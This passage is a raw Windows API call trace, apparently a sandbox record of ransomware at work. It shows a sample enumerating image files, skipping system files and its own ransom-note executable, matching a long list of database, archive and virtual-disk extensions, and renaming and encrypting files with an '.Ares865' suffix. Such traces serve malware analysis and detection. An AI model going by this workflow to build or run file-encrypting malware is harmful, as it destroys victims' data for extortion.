[0115.496] lstrlenW (lpString="rod") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0115.496] lstrlenW (lpString="rodx") returned 4 [0115.496] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0115.496] lstrlenW (lpString="rpd") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0115.496] lstrlenW (lpString="rsd") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0115.496] lstrlenW (lpString="sas7bdat") returned 8 [0115.496] lstrlenW (lpString="sbf") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0115.497] lstrlenW (lpString="scx") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0115.497] lstrlenW (lpString="sdb") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0115.497] lstrlenW (lpString="sdc") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0115.497] lstrlenW (lpString="sdf") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0115.497] lstrlenW (lpString="sis") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0115.497] lstrlenW (lpString="spq") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0115.497] lstrlenW (lpString="te") returned 2 [0115.497] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0115.497] lstrlenW (lpString="teacher") returned 7 [0115.497] lstrlenW (lpString="tmd") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0115.497] lstrlenW (lpString="tps") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0115.497] lstrlenW (lpString="trc") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0115.497] lstrlenW (lpString="trc") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0115.497] lstrlenW (lpString="trm") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0115.497] lstrlenW (lpString="udb") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0115.497] lstrlenW (lpString="udl") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0115.497] lstrlenW (lpString="usr") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0115.497] lstrlenW (lpString="v12") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0115.497] lstrlenW (lpString="vis") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0115.497] lstrlenW (lpString="vpd") returned 3 [0115.497] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0115.498] lstrlenW (lpString="vvv") returned 3 [0115.498] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0115.498] lstrlenW (lpString="wdb") returned 3 [0115.498] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0115.498] lstrlenW (lpString="wmdb") returned 4 [0115.498] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0115.498] lstrlenW (lpString="wrk") returned 3 [0115.498] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0115.498] lstrlenW (lpString="xdb") returned 3 [0115.498] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0115.498] lstrlenW (lpString="xld") returned 3 [0115.498] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0115.498] lstrlenW (lpString="xmlff") returned 5 [0115.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.Ares865") returned 82 [0115.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png.ares865"), dwFlags=0x1) returned 1 [0115.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.501] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5206) returned 1 [0115.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.501] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.502] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.502] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.502] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.504] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.511] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.539] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.540] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.573] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.581] CloseHandle (hObject=0x170) returned 1 [0115.583] CloseHandle (hObject=0x118) returned 1 [0115.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.589] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc00d2b2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc00d2b2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd699b5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.png", cAlternateFileName="")) returned 1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="aoldtz.exe") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2=".") returned 1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="..") returned 1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="windows") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="bootmgr") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="temp") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="pagefile.sys") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="boot") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="ids.txt") returned -1 [0115.589] lstrcmpiW (lpString1="10.png", lpString2="ntuser.dat") returned -1 [0115.590] lstrcmpiW (lpString1="10.png", lpString2="perflogs") returned -1 [0115.590] lstrcmpiW (lpString1="10.png", lpString2="MSBuild") returned -1 [0115.590] lstrlenW (lpString="10.png") returned 6 [0115.590] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png") returned 74 [0115.590] lstrcpyW (in: lpString1=0x2cce48a, lpString2="10.png" | out: lpString1="10.png") returned="10.png" [0115.590] lstrlenW (lpString="10.png") returned 6 [0115.590] lstrlenW (lpString="Ares865") returned 7 [0115.590] lstrlenW (lpString=".dll") returned 4 [0115.590] lstrcmpiW (lpString1="10.png", lpString2=".dll") returned 1 [0115.590] lstrlenW (lpString=".lnk") returned 4 [0115.590] lstrcmpiW (lpString1="10.png", lpString2=".lnk") returned 1 [0115.590] lstrlenW (lpString=".ini") returned 4 [0115.590] lstrcmpiW (lpString1="10.png", lpString2=".ini") returned 1 [0115.590] lstrlenW (lpString=".sys") returned 4 [0115.590] lstrcmpiW (lpString1="10.png", lpString2=".sys") returned 1 [0115.590] lstrlenW (lpString="10.png") returned 6 [0115.590] lstrlenW (lpString="bak") returned 3 [0115.590] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0115.590] lstrlenW (lpString="ba_") returned 3 [0115.590] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0115.590] lstrlenW (lpString="dbb") returned 3 [0115.590] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0115.590] lstrlenW (lpString="vmdk") returned 4 [0115.590] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0115.590] lstrlenW (lpString="rar") returned 3 [0115.590] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0115.591] lstrlenW (lpString="zip") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0115.591] lstrlenW (lpString="tgz") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0115.591] lstrlenW (lpString="vbox") returned 4 [0115.591] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0115.591] lstrlenW (lpString="vdi") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0115.591] lstrlenW (lpString="vhd") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0115.591] lstrlenW (lpString="vhdx") returned 4 [0115.591] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0115.591] lstrlenW (lpString="avhd") returned 4 [0115.591] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0115.591] lstrlenW (lpString="db") returned 2 [0115.591] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0115.591] lstrlenW (lpString="db2") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0115.591] lstrlenW (lpString="db3") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0115.591] lstrlenW (lpString="dbf") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0115.591] lstrlenW (lpString="mdf") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0115.591] lstrlenW (lpString="mdb") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0115.591] lstrlenW (lpString="sql") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0115.591] lstrlenW (lpString="sqlite") returned 6 [0115.591] lstrlenW (lpString="sqlite3") returned 7 [0115.591] lstrlenW (lpString="sqlitedb") returned 8 [0115.591] lstrlenW (lpString="xml") returned 3 [0115.591] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0115.592] lstrlenW (lpString="$er") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0115.592] lstrlenW (lpString="4dd") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0115.592] lstrlenW (lpString="4dl") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0115.592] lstrlenW (lpString="^^^") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0115.592] lstrlenW (lpString="abs") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0115.592] lstrlenW (lpString="abx") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0115.592] lstrlenW (lpString="accdb") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accdb") returned -1 [0115.592] lstrlenW (lpString="accdc") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accdc") returned -1 [0115.592] lstrlenW (lpString="accde") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accde") returned -1 [0115.592] lstrlenW (lpString="accdr") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accdr") returned -1 [0115.592] lstrlenW (lpString="accdt") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accdt") returned -1 [0115.592] lstrlenW (lpString="accdw") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accdw") returned -1 [0115.592] lstrlenW (lpString="accft") returned 5 [0115.592] lstrcmpiW (lpString1="0.png", lpString2="accft") returned -1 [0115.592] lstrlenW (lpString="adb") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.592] lstrlenW (lpString="adb") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.592] lstrlenW (lpString="ade") returned 3 [0115.592] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0115.592] lstrlenW (lpString="adf") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0115.593] lstrlenW (lpString="adn") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0115.593] lstrlenW (lpString="adp") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0115.593] lstrlenW (lpString="alf") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0115.593] lstrlenW (lpString="ask") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0115.593] lstrlenW (lpString="btr") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0115.593] lstrlenW (lpString="cat") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0115.593] lstrlenW (lpString="cdb") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0115.593] lstrlenW (lpString="ckp") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0115.593] lstrlenW (lpString="cma") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0115.593] lstrlenW (lpString="cpd") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0115.593] lstrlenW (lpString="dacpac") returned 6 [0115.593] lstrlenW (lpString="dad") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0115.593] lstrlenW (lpString="dadiagrams") returned 10 [0115.593] lstrlenW (lpString="daschema") returned 8 [0115.593] lstrlenW (lpString="db-journal") returned 10 [0115.593] lstrlenW (lpString="db-shm") returned 6 [0115.593] lstrlenW (lpString="db-wal") returned 6 [0115.593] lstrlenW (lpString="dbc") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0115.593] lstrlenW (lpString="dbs") returned 3 [0115.593] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0115.594] lstrlenW (lpString="dbt") returned 3 [0115.594] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0115.594] lstrlenW (lpString="dbv") returned 3 [0115.594] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0115.594] lstrlenW (lpString="dbx") returned 3 [0115.594] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0115.594] lstrlenW (lpString="dcb") returned 3 [0115.594] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0115.594] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0115.595] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0115.595] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0115.595] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0115.595] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0115.596] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0115.596] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0115.596] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0115.596] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0115.596] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0115.597] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0115.597] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0115.597] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0115.597] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0115.598] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0115.598] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0115.598] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0115.598] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0115.598] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0115.599] lstrcmpiW (lpString1="0.png", lpString2="fmp12") returned -1 [0115.599] lstrcmpiW (lpString1="0.png", lpString2="fmpsl") returned -1 [0115.599] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0115.599] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0115.600] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0115.600] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0115.600] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0115.600] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0115.600] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0115.601] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0115.601] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0115.601] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0115.601] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0115.601] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0115.602] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0115.602] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0115.602] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0115.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.Ares865") returned 83 [0115.603] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png.ares865"), dwFlags=0x1) returned 1 [0115.606] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.606] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.606] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.607] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.607] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.607] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.609] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.610] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.610] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.610] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.611] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.611] CloseHandle (hObject=0x170) returned 1 [0115.611] CloseHandle (hObject=0x118) returned 1 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.612] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc00d2b2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc00d2b2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="11.png", cAlternateFileName="")) returned 1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="aoldtz.exe") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2=".") returned 1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="..") returned 1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="windows") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="bootmgr") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="temp") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="pagefile.sys") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="boot") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="ids.txt") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="ntuser.dat") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="perflogs") returned -1 [0115.612] lstrcmpiW (lpString1="11.png", lpString2="MSBuild") returned -1 [0115.612] lstrlenW (lpString="11.png") returned 6 [0115.612] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png") returned 75 [0115.612] lstrcpyW (in: lpString1=0x2cce48a, lpString2="11.png" | out: lpString1="11.png") returned="11.png" [0115.612] lstrlenW (lpString="11.png") returned 6 [0115.612] lstrlenW (lpString="Ares865") returned 7 [0115.612] lstrlenW (lpString=".dll") returned 4 [0115.612] lstrcmpiW (lpString1="11.png", lpString2=".dll") returned 1 [0115.612] lstrlenW (lpString=".lnk") returned 4 [0115.612] lstrcmpiW (lpString1="11.png", lpString2=".lnk") returned 1 [0115.612] lstrlenW (lpString=".ini") returned 4 [0115.612] lstrcmpiW (lpString1="11.png", lpString2=".ini") returned 1 [0115.612] lstrlenW (lpString=".sys") returned 4 [0115.612] lstrcmpiW (lpString1="11.png", lpString2=".sys") returned 1 [0115.612] lstrlenW (lpString="11.png") returned 6 [0115.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.Ares865") returned 83 [0115.613] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png.ares865"), dwFlags=0x1) returned 1 [0115.614] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.614] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.614] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.615] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 